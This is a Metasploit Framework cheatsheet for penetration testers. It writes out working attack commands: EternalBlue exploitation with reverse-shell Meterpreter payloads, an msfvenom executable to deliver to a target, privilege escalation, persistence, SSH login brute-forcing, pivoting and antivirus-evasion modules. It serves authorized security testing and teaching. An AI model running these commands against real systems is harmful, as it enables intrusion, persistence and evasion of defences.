Ultimate Metasploit Framework Cheatsheet
A comprehensive reference guide for penetration testers and security professionals using the Metasploit Framework, including essential commands, modules, payloads, and workflows.
Table of Contents
- Introduction to Metasploit
- Installation & Setup
- Basic Commands
- MSFconsole Commands
- Working with Modules
- Database Commands
- Payloads Reference
- Exploit Commands
- Post-Exploitation
- Meterpreter Commands
- Auxiliary Modules
- Pivoting & Network Traversal
- Evasion Techniques
- Common Workflows
- Additional Resources
Introduction to Metasploit
The Metasploit Framework is an open-source penetration testing and exploitation framework that provides the infrastructure, content, and tools to perform security assessments and penetration testing. It’s maintained by Rapid7 and the security community.
Core Components
- MSFconsole – Command-line interface
- Modules – Exploits, auxiliaries, post, payloads, encoders, nops
- Tools – Collection of command-line utilities
- Libraries – Supporting code libraries
- Plugins – Extend functionality
Module Types
- Exploits – Code that takes advantage of vulnerabilities
- Payloads – Code delivered by exploits
- Auxiliaries – Scanners, fuzzers, sniffers
- Post – Post-exploitation modules
- Encoders – Payload obfuscation
- Nops – No Operation generators
Versions
Metasploit Pro
Metasploit Express
Metasploit Framework
Armitage
The open-source Metasploit Framework (MSF) is free and what this cheatsheet covers.
Installation & Setup
Installing Metasploit on Linux
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
Installing on Kali Linux (Pre-installed)
sudo apt update && sudo apt install metasploit-framework -y
Updating Metasploit
msfupdate
Starting Metasploit Console
msfconsole
Setting Up Database
sudo systemctl start postgresql
sudo msfdb init
Note: A properly configured PostgreSQL database significantly improves the Metasploit experience by allowing you to store scan results, hosts, and session information.
Basic Commands
| Command | Description |
|---|---|
help |
Show available commands |
version |
Show the framework and console library version |
exit or quit |
Exit the console |
banner |
Display an awesome metasploit banner |
connect |
Communicate with a host |
irb |
Drop into irb scripting mode |
sleep |
Do nothing for the specified number of seconds |
spool |
Write console output to a file |
load |
Load a plugin from the specified path |
unload |
Unload a previously loaded plugin |
Navigating Through Commands
- Use Tab for command completion
- Use Arrow Up/Down keys for command history
- Use Ctrl+R to search command history
- Use Ctrl+L to clear the screen
MSFconsole Commands
Core Commands
| Command | Description |
|---|---|
search [keyword] |
Search for modules |
use [module] |
Select a module by name |
info |
Display information about the current module |
show options |
Show available options for the current module |
set [option] [value] |
Set a value for an option |
setg [option] [value] |
Set a global value for an option |
unset [option] |
Unset an option’s value |
unsetg [option] |
Unset a global option’s value |
back |
Move back from the current context |
run or exploit |
Run the selected module |
check |
Check if the target is vulnerable |
sessions |
List all active sessions |
sessions -i [ID] |
Interact with a session |
sessions -k [ID] |
Kill a session |
jobs |
List all active jobs |
jobs -k [ID] |
Kill a job |
Advanced Console Commands
| Command | Description |
|---|---|
workspace |
Switch between database workspaces |
save |
Save active datastores |
resource [file] |
Run commands from a file |
makerc [file] |
Save commands entered since start to a file |
history |
Show command history |
route |
Route traffic through a session |
setenv [var] [val] |
Set an environment variable |
unsetenv [var] |
Unset an environment variable |
handlers |
List all active payload handlers |
Pro Tip: Create resource scripts (.rc files) with commonly used command sequences to automate repetitive tasks. Run with:
resource path/to/script.rc
Working with Modules
Finding Modules
search cve:2021 type:exploit platform:windows
Search Filters
| Filter | Description | Example |
|---|---|---|
type: |
Module type | search type:exploit |
name: |
Module name | search name:smb |
platform: |
Target platform | search platform:windows |
author: |
Module author | search author:hdm |
cve: |
CVE identifier | search cve:2020 |
rank: |
Exploit reliability rank | search rank:excellent |
app: |
Application name | search app:ssh |
Module Information & Options
use exploit/windows/smb/ms17_010_eternalblue
info
show options
set RHOSTS 192.168.1.10
set LHOST 192.168.1.5
show payloads
set PAYLOAD windows/x64/meterpreter/reverse_tcp
Module Categories
Exploit Types
browser fileformat remote localUse show exploits to list all available exploits
Auxiliary Types
scanner dos fuzzer sniffer adminUse show auxiliary to list all auxiliary modules
Post-Exploitation
gather escalate manage reconUse show post to list all post modules
Database Commands
Database Setup
db_status
db_connect [username]:[password]@[host]:[port]/[database]
Workspace Management
workspace
workspace -a [name]
workspace -d [name]
workspace -r [old_name] [new_name]
Import Scan Data
db_import [path/to/scan.xml]
Host and Service Commands
| Command | Description |
|---|---|
hosts |
List all hosts in the database |
hosts -a [address] |
Add a host to the database |
hosts -d [address] |
Delete a host from the database |
hosts -S [column] |
Search for hosts |
services |
List all services in the database |
services -a [protocol] -p [port] -h [host] |
Add a service to the database |
services -s [name] |
Search for services by name |
services -p [port] |
Search for services by port |
vulns |
List all vulnerabilities in the database |
loot |
List all loot in the database |
notes |
List all notes in the database |
creds |
List all credentials in the database |
Running Scans
db_nmap -sV -p- 192.168.1.0/24
Payloads Reference
Types of Payloads
Staged Payloads
Payloads that are sent in multiple stages. The initial payload is small and connects back to the attacker to download the rest of the payload.
windows/meterpreter/reverse_tcp linux/x86/shell/reverse_tcpSingle Payloads
Payloads that are sent in one complete package. These are larger but don’t require a second stage.
windows/meterpreter_reverse_tcp linux/x86/shell_reverse_tcpInline Payloads
Payloads that are embedded directly within the exploit code.
windows/shell_bind_tcp linux/x86/shell_bind_tcpCommon Payloads
| Payload | Description |
|---|---|
windows/meterpreter/reverse_tcp |
Meterpreter reverse shell for Windows |
linux/x86/meterpreter/reverse_tcp |
Meterpreter reverse shell for Linux |
windows/shell/reverse_tcp |
Standard reverse shell for Windows |
linux/x86/shell/reverse_tcp |
Standard reverse shell for Linux |
windows/meterpreter/bind_tcp |
Meterpreter bind shell for Windows |
linux/x86/meterpreter/bind_tcp |
Meterpreter bind shell for Linux |
windows/shell/bind_tcp |
Standard bind shell for Windows |
linux/x86/shell/bind_tcp |
Standard bind shell for Linux |
windows/meterpreter/reverse_http |
Meterpreter reverse HTTP shell for Windows |
windows/meterpreter/reverse_https |
Meterpreter reverse HTTPS shell for Windows |
Payload Options
show payloads
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.1.5
set LPORT 4444
Note: Always choose the appropriate payload based on the target system and network conditions. Staged payloads are often preferred for their smaller initial footprint.
Exploit Commands
Basic Exploit Workflow
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
set LHOST 192.168.1.5
set LPORT 4444
exploit
Exploit Options
| Option | Description |
|---|---|
RHOSTS |
Target address(es) |
RPORT |
Target port |
LHOST |
Local host (attacker’s IP) |
LPORT |
Local port (attacker’s port) |
SRVHOST |
Server host for payload delivery |
SRVPORT |
Server port for payload delivery |
TARGET |
Target system type |
PAYLOAD |
Payload to use |
EXITFUNC |
Exit technique (process, thread, seh) |
VERBOSE |
Enable verbose output |
Exploit Techniques
Bind Shell
The payload opens a port on the target system, and the attacker connects to it.
Reverse Shell
The payload connects back to the attacker’s system, which listens for incoming connections.
reverse_tcpMeterpreter
An advanced, dynamically extensible payload that provides a command shell with additional features.
meterpreterExploit Examples
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
set LHOST 192.168.1.5
set LPORT 4444
exploit
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 4444
exploit
Pro Tip: Always test exploits in a controlled environment before using them in real-world scenarios. Use
check to verify if the target is vulnerable.
Post-Exploitation
Meterpreter Basics
sessions -i [ID]
help
sysinfo
getuid
ps
migrate [PID]
File System Commands
cd [directory]
ls
download [file]
upload [file]
cat [file]
edit [file]
rm [file]
Network Commands
ipconfig
route
portfwd add -l [local_port] -p [remote_port] -r [remote_host]
arp
netstat
Privilege Escalation
getsystem
run post/windows/escalate/getsystem
run post/multi/recon/local_exploit_suggester
Information Gathering
run post/windows/gather/checkvm
run post/windows/gather/enum_applications
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_patches
run post/windows/gather/enum_shares
run post/windows/gather/enum_snmp
run post/windows/gather/enum_tokens
run post/windows/gather/enum_services
Persistence
run persistence -X -i [interval] -p [port] -r [remote_host]
run post/windows/manage/persistence_exe
Note: Always ensure you have proper authorization before performing post-exploitation activities on any system.
Meterpreter Commands
Core Commands
| Command | Description |
|---|---|
background |
Background the current session |
exit |
Terminate the Meterpreter session |
help |
Display help menu |
info |
Display information about a module |
irb |
Open an interactive Ruby shell |
load |
Load a Meterpreter extension |
migrate |
Migrate to another process |
run |
Execute a Meterpreter script or post module |
sessions |
List all active sessions |
use |
Load a module by name |
File System Commands
| Command | Description |
|---|---|
cd |
Change directory |
ls |
List files |
pwd |
Print working directory |
cat |
Display file contents |
download |
Download a file |
upload |
Upload a file |
rm |
Delete a file |
mkdir |
Create a directory |
rmdir |
Remove a directory |
search |
Search for files |
Network Commands
| Command | Description |
|---|---|
ipconfig |
Display network interfaces |
portfwd |
Forward a port |
route |
View or modify the routing table |
arp |
Display the ARP cache |
netstat |
Display network connections |
System Commands
| Command | Description |
|---|---|
sysinfo |
Display system information |
ps |
List running processes |
kill |
Terminate a process |
getuid |
Get the user that the server is running as |
getpid |
Get the current process identifier |
execute |
Execute a command |
shell |
Drop into a system shell |
reboot |
Reboot the remote computer |
shutdown |
Shutdown the remote computer |
Privilege Escalation
getsystem
run post/windows/escalate/getsystem
run post/multi/recon/local_exploit_suggester
Meterpreter Scripts
run post/windows/gather/checkvm
run post/windows/gather/enum_applications
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_patches
run post/windows/gather/enum_shares
run post/windows/gather/enum_snmp
run post/windows/gather/enum_tokens
run post/windows/gather/enum_services
Pro Tip: Use
load -l to list all available Meterpreter extensions and load [extension] to load a specific extension.
Auxiliary Modules
Common Auxiliary Modules
Scanners
Modules for scanning networks, services, and vulnerabilities.
scanner smb sshFuzzers
Modules for fuzzing protocols and applications.
fuzzer http smbSniffers
Modules for network traffic capture and analysis.
sniffer pcapUsing Auxiliary Modules
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
run
Example: SMB Version Detection
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
run
Example: SSH Login Check
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.10
set USERNAME root
set PASSWORD password
run
Example: HTTP Directory Brute Force
use auxiliary/scanner/http/dir_scanner
set RHOSTS 192.168.1.10
set THREADS 10
run
Note: Auxiliary modules are powerful tools for reconnaissance and information gathering. Always use them responsibly and with proper authorization.
Pivoting & Network Traversal
Port Forwarding
portfwd add -l [local_port] -p [remote_port] -r [remote_host]
Routing Traffic
route add [subnet] [netmask] [session_id]
Example: Pivoting Through a Compromised Host
sessions -i [ID]
run autoroute -s 192.168.2.0/24
background
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.2.0/24
run
Example: Port Forwarding
portfwd add -l 3389 -p 3389 -r 192.168.2.10
rdesktop 127.0.0.1
Pro Tip: Use
route to view the current routing table and route flush to clear all routes.
Evasion Techniques
Payload Encoding
use encoder/x86/shikata_ga_nai
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 4444
generate -t exe -f /tmp/payload.exe
Payload Obfuscation
use evasion/windows/windows_defender_exe
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 4444
run
Example: Bypassing Antivirus
use evasion/windows/windows_defender_exe
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 4444
run
Note: Evasion techniques should be used responsibly and only in authorized penetration testing scenarios.
Common Workflows
Basic Exploitation Workflow
- Reconnaissance:
db_nmap -sV -p- 192.168.1.0/24 - Identify Vulnerabilities:
search cve:2021 type:exploit - Select Exploit:
use exploit/windows/smb/ms17_010_eternalblue - Set Options:
set RHOSTS 192.168.1.10,set LHOST 192.168.1.5 - Run Exploit:
exploit - Post-Exploitation:
meterpreter > sysinfo
Client-Side Exploitation Workflow
- Generate Payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe -o payload.exe - Set Up Listener:
use exploit/multi/handler,set PAYLOAD windows/meterpreter/reverse_tcp,set LHOST 192.168.1.5,set LPORT 4444 - Run Listener:
exploit - Deliver Payload: Send
payload.exeto the target - Post-Exploitation:
meterpreter > getuid
Web Application Testing Workflow
- Scan for Vulnerabilities:
use auxiliary/scanner/http/dir_scanner,set RHOSTS 192.168.1.10,run - Exploit Vulnerabilities:
use exploit/windows/iis/iis_webdav_upload_asp,set RHOSTS 192.168.1.10,set LHOST 192.168.1.5,exploit - Post-Exploitation:
meterpreter > shell
Pro Tip: Always document your steps and findings during penetration testing. Use
makerc to save your command history to a file.
Additional Resources
Official Documentation
Books
- “Metasploit: The Penetration Tester’s Guide” by David Kennedy et al.
- “Mastering Metasploit” by Nipun Jaswal
